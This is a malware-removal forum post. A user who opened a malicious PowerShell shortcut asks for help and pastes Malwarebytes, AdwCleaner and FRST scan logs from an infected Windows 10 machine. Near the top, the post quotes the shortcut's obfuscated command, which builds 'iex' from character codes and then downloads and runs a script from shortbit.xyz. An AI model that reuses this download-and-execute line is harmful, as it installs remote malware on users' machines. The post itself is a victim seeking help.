I have done the same as this guy:
https://forums.malwarebytes.com/topic/245566-i-opened-a-malicious-powershell-shortcut/
My malicious file seems to be slightly different however:
%20-ExecutionPolicy%20UnRestricted%20-Windo%201%20$ag=[string][char[]]@(0x69,0x65,0x58)%20-replace%20'%20',''%3Bsal%20s%20$ag%3B$nq=((New-Object%20Net.WebClient)).DownloadString('http://shortbit.xyz/psp')%3Bs%20$nq
I have followed all of the steps in that post. Malwarebytes found some malitious files and removed them..... I hope i'm not still infected.
All of the logs are below.
Thankyou!
---Malwarebytes---
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 6/9/19
Scan Time: 7:28 PM
Log File: 63f389d8-8ae4-11e9-b47d-6c4b901a0b15.json
-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.586
Update Package Version: 1.0.10966
License: Free
-System Information-
OS: Windows 10 (Build 17134.765)
CPU: x64
File System: NTFS
User: DESKTOP-DQ6B75G\MYMLA
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 317992
Threats Detected: 16
Threats Quarantined: 16
Time Elapsed: 7 min, 1 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 2
Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966
Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966
Module: 2
Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966
Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966
Registry Key: 4
PUP.Optional.DefaultSearch, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\nladljmabboanhihfkjacnnkgjhnokhj, Quarantined, [300], [550469],1.0.10966
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Scheduled Updater - {ddf058d8-0f5a-412d-bdaf-9092c48aa545}, Quarantined, [0], [392686],1.0.10966
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{367BB1AA-628D-45AF-A386-B87979AC2CDE}, Quarantined, [0], [392686],1.0.10966
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{367BB1AA-628D-45AF-A386-B87979AC2CDE}, Quarantined, [0], [392686],1.0.10966
Registry Value: 1
PUP.Optional.DefaultSearch, HKU\S-1-5-21-1007420050-912919110-3395148121-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|NLADLJMABBOANHIHFKJACNNKGJHNOKHJ, Quarantined, [300], [550469],1.0.10966
Registry Data: 0
(No malicious items detected)
Data Stream: 0
(No malicious items detected)
Folder: 0
(No malicious items detected)
File: 7
PUP.Optional.DefaultSearch, C:\USERS\MYMLA\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [300], [550469],1.0.10966
Generic.Malware/Suspicious, C:\WINDOWS\SYSTEM32\TASKS\Scheduled Updater - {ddf058d8-0f5a-412d-bdaf-9092c48aa545}, Quarantined, [0], [392686],1.0.10966
Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966
RiskWare.Tool.HCK, C:\USERS\MYMLA\DOWNLOADS\166.RAR, Quarantined, [7580], [97362],1.0.10966
RiskWare.BitCoinMiner, C:\USERS\MYMLA\DOWNLOADS\NHM_WINDOWS_1.9.0.6 (1).ZIP, Quarantined, [769], [485277],1.0.10966
RiskWare.BitCoinMiner, C:\USERS\MYMLA\DOWNLOADS\CLAYMORE.S.ZCASH.AMD.GPU.MINER.V12.6.ZIP, Quarantined, [769], [556050],1.0.10966
PUP.Optional.DefaultSearch, C:\USERS\MYMLA\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [300], [469798],1.0.10966
Physical Sector: 0
(No malicious items detected)
WMI: 0
(No malicious items detected)
(end)
---ADWCleaner---
# -------------------------------
# Malwarebytes AdwCleaner 7.3.0.0
# -------------------------------
# Build: 04-04-2019
# Database: 2019-05-27.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 06-09-2019
# Duration: 00:00:08
# OS: Windows 10 Home
# Scanned: 27501
# Detected: 0
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
No malicious folders found.
***** [ Files ] *****
No malicious files found.
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
No malicious tasks found.
***** [ Registry ] *****
No malicious registry entries found.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
AdwCleaner[S00].txt - [1767 octets] - [09/06/2019 19:46:07]
AdwCleaner[C00].txt - [1841 octets] - [09/06/2019 19:46:22]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########
---FRST---
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-06-2019 01
Ran by MYMLA (administrator) on DESKTOP-DQ6B75G (LENOVO 90H1001GUK) (09-06-2019 19:51:31)
Running from C:\Users\MYMLA\Downloads
Loaded Profiles: MYMLA (Available Profiles: MYMLA)
Platform: Windows 10 Home Version 1803 17134.765 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe
(Cisco Video Technologies Israel Ltd. -> Cisco) C:\Users\MYMLA\AppData\Local\Cisco\VideoGuardPlayer\VideoGuardMonitor\CiscoVideoGuardMonitor.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe
(CyberLink Corp. -> CyberLink Corp.) C:\Program Files (x86)\Cyberlink\PowerDVD14\PDVD14Serv.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Lenovo -> Lenovo Group Ltd.) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe
(LENOVO -> Lenovo) C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe
(Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\MYMLA\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Locator.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PRIMAX ELECTRONICS LTD. -> ) C:\Program Files\Lenovo\Lenovo Essential Wireless Keyboard\KBOSD.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(TunnelBear -> ) C:\Program Files (x86)\TunnelBear\TunnelBear.Maintenance.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.3.237\WsAppService.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [Lenovo Essential Wireless Keyboard OSD] => C:\Program Files\Lenovo\Lenovo Essential Wireless Keyboard\KBOSD.exe [443192 2016-11-30] (PRIMAX ELECTRONICS LTD. -> )
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [672192 2018-04-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-12-05] (CyberLink -> CyberLink)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-07] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3152160 2019-04-29] (Valve -> Valve Corporation)
HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\Run: [VideoGuardMonitor] => C:\Users\MYMLA\AppData\Local\Cisco\VideoGuardPlayer\VideoGuardMonitor\CiscoVideoGuardMonitor.exe [2345736 2018-04-17] (Cisco Video Technologies Israel Ltd. -> Cisco)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.80\Installer\chrmstp.exe [2019-06-06] (Google LLC -> Google LLC)
Lsa: [Authentication Packages] msv1_0 SshdPinAuthLsa
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk [2018-09-17]
ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (No File)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1BC493F1-AA0D-4658-9CA8-8F969C1ECC17} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\c00a1f9a-ebb2-4ec1-8506-2cd23fa726ed => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.)
Task: {20FC8401-FF1D-48D2-8F48-974D84E3BB7B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {2197FE90-5D46-4141-AF1F-A53E9AF1FE26} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {4E7BE99F-6FDA-44E0-9E68-9B9F1182D839} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-16] (Google Inc -> Google Inc.)
Task: {4F2495E0-A32F-4B78-A8C7-E98724AF295B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4406928 2019-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {5085B05A-951F-4C07-96FB-DAEDFFEFCD4D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [25907200 2019-04-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {6D1413A8-E311-4A78-B53C-C6A5D2414808} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [54440 2019-04-24] (Lenovo -> Lenovo Group Ltd.)
Task: {6FC733B0-67A6-4BB3-9947-9EF11AC8BE5B} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\9259295b-c195-48f0-80a5-b99048df5a30 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.)
Task: {7759E137-96CE-4322-955E-4A5AA5FC1F60} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {7B4EB0D6-266D-4A34-B14F-1A1BF7FC8561} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {7BD2BD45-5479-4A74-A0CC-639A8E8C4370} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-16] (Google Inc -> Google Inc.)
Task: {7E9AFD49-C9B4-436A-B6DD-DA986CB9BCD1} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1432200 2019-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {81B06D5F-342D-4FC0-BDB6-5262EB8AF37A} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\0605c737-d666-4405-bdff-bb907155845a => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.)
Task: {82600555-BB57-4ECD-AC75-96983C178734} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4406928 2019-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {8459D02D-A42D-4018-998E-85BD00D635BF} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1432200 2019-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {9CF68B9D-7EFB-47B5-922D-562B25749EA5} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [25907200 2019-04-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FBD5D5A-E054-4184-A6EF-2859302B9991} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {AB9821A2-FDE7-4BE7-A323-60F752D7DEAC} - System32\Tasks\PDVDServ14 Task => C:\Program Files (x86)\CyberLink\PowerDVD14\PDVD14Serv.exe [88344 2017-04-26] (CyberLink Corp. -> CyberLink Corp.)
Task: {B43C725C-FF64-4A54-B813-906105ECDF5F} - System32\Tasks\LiteStorageUpdater => C:\Program [Argument = Files\Lenovo\LiveStorage\Server\LiteStorageUpdater.exe]
Task: {C9AC6E34-19DC-404C-8C17-292A2AE472AE} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => %windir%\system32\sc.exe START ImControllerService
Task: {DFC52D0B-A564-45BD-9242-2E75D9302DFD} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [112376 2019-04-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {EB746362-9CAD-462F-A3D9-2BC5705C2CCB} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [112376 2019-04-21] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{1c877760-c100-4b55-adb8-b717fe45dff1}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{e7b99320-9b71-48ae-b327-d16485f8915b}: [DhcpNameServer] 172.18.13.1
Internet Explorer:
==================
HKU\S-1-5-21-1007420050-912919110-3395148121-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-1007420050-912919110-3395148121-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.lenovo.com
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssv.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default [2019-06-09]
CHR Extension: (Slides) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-16]
CHR Extension: (Docs) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-16]
CHR Extension: (Google Drive) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (YouTube) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-16]
CHR Extension: (Sheets) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-16]
CHR Extension: (HTTPS Everywhere) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcbommkclmclpchllfjekcdonpmejbdp [2019-06-05]
CHR Extension: (Google Docs Offline) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-09-16]
CHR Extension: (Gmail) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-29]
CHR Extension: (Chrome Media Router) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-06]
CHR Profile: C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-11-04]
CHR Profile: C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\System Profile [2018-11-04]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AMD External Events Utility; C:\WINDOWS\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atiesrxx.exe [508016 2018-10-15] (Advanced Micro Devices, Inc. -> AMD)
R2 CCSDK; C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe [502040 2016-11-09] (LENOVO -> Lenovo)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11082536 2019-04-16] (Microsoft Corporation -> Microsoft Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.)
R2 LiveStorageService; C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe [823568 2017-05-27] (LENOVO -> Lenovo)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
R2 RtkAudioUniversalService; C:\WINDOWS\System32\RtkAudUService64.exe [672192 2018-04-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
R2 RtkBtManServ; C:\WINDOWS\RtkBtManServ.exe [301536 2017-05-20] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
S3 sshd; C:\WINDOWS\System32\OpenSSH\sshd.exe [970240 2018-05-20] (Microsoft Windows -> )
S3 SshdBroker; C:\WINDOWS\System32\SshdBroker.dll [285696 2019-02-16] (Microsoft Windows -> Microsoft Corporation)
R2 TunnelBearMaintenance; C:\Program Files (x86)\TunnelBear\TunnelBear.Maintenance.exe [120440 2018-09-11] (TunnelBear -> )
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\NisSrv.exe [3905952 2018-09-16] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MsMpEng.exe [110944 2018-09-16] (Microsoft Corporation -> Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.3.237\WsAppService.exe [495720 2018-07-04] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 WsDrvInst; C:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe [120016 2018-07-04] (Wondershare Technology Co.,Ltd -> Wondershare)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 amdgpio2; C:\WINDOWS\System32\drivers\amdgpio2.sys [43400 2017-03-01] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [67544 2018-09-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 amdkmcsp; C:\WINDOWS\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atikmdag.sys [47499376 2018-10-15] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atikmpag.sys [589936 2018-10-15] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [103680 2018-09-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 AMDPCIDev; C:\WINDOWS\System32\drivers\AMDPCIDev.sys [31592 2018-04-25] (Advanced Micro Devices Inc. -> Advanced Micro Devices)
R0 amdpsp; C:\WINDOWS\System32\DRIVERS\amdpsp.sys [243056 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
